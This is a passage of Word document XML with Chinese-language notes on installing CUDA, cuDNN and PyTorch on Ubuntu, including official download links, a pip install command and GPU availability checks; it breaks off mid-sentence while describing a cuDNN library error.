    <w:p w14:paraId="5929D713" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="007D5499" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352CD7C8" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接下来解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EF25E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1984CA68" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CUDA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发明的一种并行计算平台和编程模型。它通过利用图形处理器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (GPU) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的处理能力，可大幅提升计算性能；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655AB7C" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuDNN(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深度神经网络库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加速的用于深度神经网络的原语库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即用来加速神经网络的推理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA07442" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuDNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相当于是一个编译好的功能包，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CUDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行辅助，等会儿安装过程中，我们会有所体现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998FB5D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="002B55DD" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF0147E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F33C4" w14:textId="7111AEAE" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照此处可以选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本，我选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00D1315C">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7681A1C5" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00134273">
        <w:t>https://developer.nvidia.com/cuda-toolkit-archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6627EBEA" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249258D6" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D66C1A4" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1F7764" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照下面几个链接，通常会引导你下载最新的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433DD64" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId270" w:history="1">
        <w:r w:rsidRPr="00627070">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://developer.nvidia.com/zh-cn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04C129A9" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC4D48">
        <w:t>https://developer.nvidia.com/cuda-downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167F444" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC4D48">
        <w:t>https://developer.nvidia.com/cuda-downloads?target_os=Linux&amp;target_arch=x86_64&amp;Distribution=Ubuntu&amp;target_version=22.04&amp;target_type=runfile_local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C128D34" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBFB5B8" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB312A" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C03B06">
        <w:t>https://blog.csdn.net/qq_29750461/article/details/128352125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A0E32" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384F6A42" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">syj@syj-ubuntu:/usr/local$ </w:t>
      </w:r>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nvcc -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC3480" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="0069236D" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nvcc: NVIDIA (R) Cuda compiler driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66FA20" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="0069236D" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Copyright (c) 2005-2023 NVIDIA Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F967F7C" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="0069236D" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Built on Fri_Jan__6_16:45:21_PST_2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA57411" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="0069236D" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuda compilation tools, </w:t>
      </w:r>
      <w:r w:rsidRPr="00772E56">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>release 12.0, V12.0.140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3562769C" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0069236D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Build cuda_12.0.r12.0/compiler.32267302_0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D0E9F" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD6BC54" w14:textId="65CDF300" w:rsidR="00E233EB" w:rsidRDefault="00585183" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="_Toc159780217"/>
      <w:r>
        <w:t>torch+</w:t>
      </w:r>
      <w:r w:rsidR="00E233EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00E233EB">
        <w:t>uDNN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="796"/>
    </w:p>
    <w:p w14:paraId="7803E929" w14:textId="4BC13263" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB6D5D5" w14:textId="3ADE0121" w:rsidR="00663541" w:rsidRDefault="00663541" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始是直接去官网下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cudnn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是这个不奏效，不如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE2FF1" w14:textId="0BE55D37" w:rsidR="00663541" w:rsidRDefault="00663541" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是没成功的过程我还是记录一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935AC97" w14:textId="77777777" w:rsidR="00663541" w:rsidRDefault="00663541" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4914B378" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡的官网的账户后，访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4AFE">
        <w:t>https://developer.nvidia.com/rdp/cudnn-download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A35D9E3" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仿照上面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>UDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装过程的描述，安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104CA288" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239E9D62" w14:textId="43F89EA1" w:rsidR="0067564D" w:rsidRDefault="00887C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>torch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E999582" w14:textId="7690ABC1" w:rsidR="00887C16" w:rsidRDefault="002730EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId271" w:history="1">
        <w:r w:rsidRPr="00627070">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://pytorch.org/get-started/locally/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79556641" w14:textId="2604786B" w:rsidR="002730EB" w:rsidRDefault="008528EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId272" w:history="1">
        <w:r w:rsidRPr="00627070">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://download.pytorch.org/whl/torch_stable.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B58861F" w14:textId="426390DE" w:rsidR="008528EF" w:rsidRPr="008528EF" w:rsidRDefault="008528EF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是在轮子的一个站下的，不是官方的哪个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FBE7E" w14:textId="7565A0BC" w:rsidR="00887C16" w:rsidRDefault="00493961" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完整复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载命令然后执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369774C9" w14:textId="25B058E3" w:rsidR="0067564D" w:rsidRDefault="00FE0A14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0A14">
        <w:t>python3 -m pip install  torch torchvision torchaudio --extra-index-url https://download.pytorch.org/whl/cu117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49282E82" w14:textId="25C13F6B" w:rsidR="00804FFB" w:rsidRDefault="00804FFB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意检查，看能不能识别到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00392EFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要反复确认以下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50882B" w14:textId="77777777" w:rsidR="00694E35" w:rsidRDefault="004E3EC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00694E35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00694E35">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>orch.cuda.is_available()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAC15E" w14:textId="2A7A26C4" w:rsidR="004E3EC4" w:rsidRDefault="004E3EC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2DF237" w14:textId="665CF639" w:rsidR="00765B9F" w:rsidRDefault="00765B9F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C219D49" wp14:editId="5D10CA6C">
            <wp:extent cx="5274310" cy="95694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274310" cy="956945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFFC795" w14:textId="517786DF" w:rsidR="00804FFB" w:rsidRDefault="00F42F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BBF273" wp14:editId="21388715">
            <wp:extent cx="5274310" cy="1092835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="58" name="图片 58"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电脑萤幕的截图&#10;&#10;描述已自动生成"/>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274310" cy="1092835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D356C1" w14:textId="5F263122" w:rsidR="00AB2EB7" w:rsidRDefault="00AB2EB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6622CC3F" wp14:editId="617468B8">
            <wp:extent cx="5274310" cy="2748915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="57" name="图片 57"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形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成"/>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274310" cy="2748915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="642DD7A1" w14:textId="1B2B241B" w:rsidR="00AB2EB7" w:rsidRDefault="00AB2EB7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6114CE0A" w14:textId="77777777" w:rsidR="00663541" w:rsidRDefault="00663541" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D7D03D" w14:textId="3839EF8F" w:rsidR="0067564D" w:rsidRDefault="00040391" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cudnn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A811CD" w14:textId="680EAFBF" w:rsidR="00040391" w:rsidRPr="00FE2DFD" w:rsidRDefault="00437F82" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00437F82">
        <w:t>https://developer.nvidia.com/rdp/cudnn-download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71283E" w14:textId="1D436335" w:rsidR="00080FAB" w:rsidRDefault="007A1B20" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为之前装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:t>11.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以我去该地址下载了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>udnn 8.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，但是安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tensorflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候还是报错</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1B20">
        <w:t>'libcudnn.so.8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。整不了，好几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cudnn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本都解决不了这个问题，然后随便复制一个这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
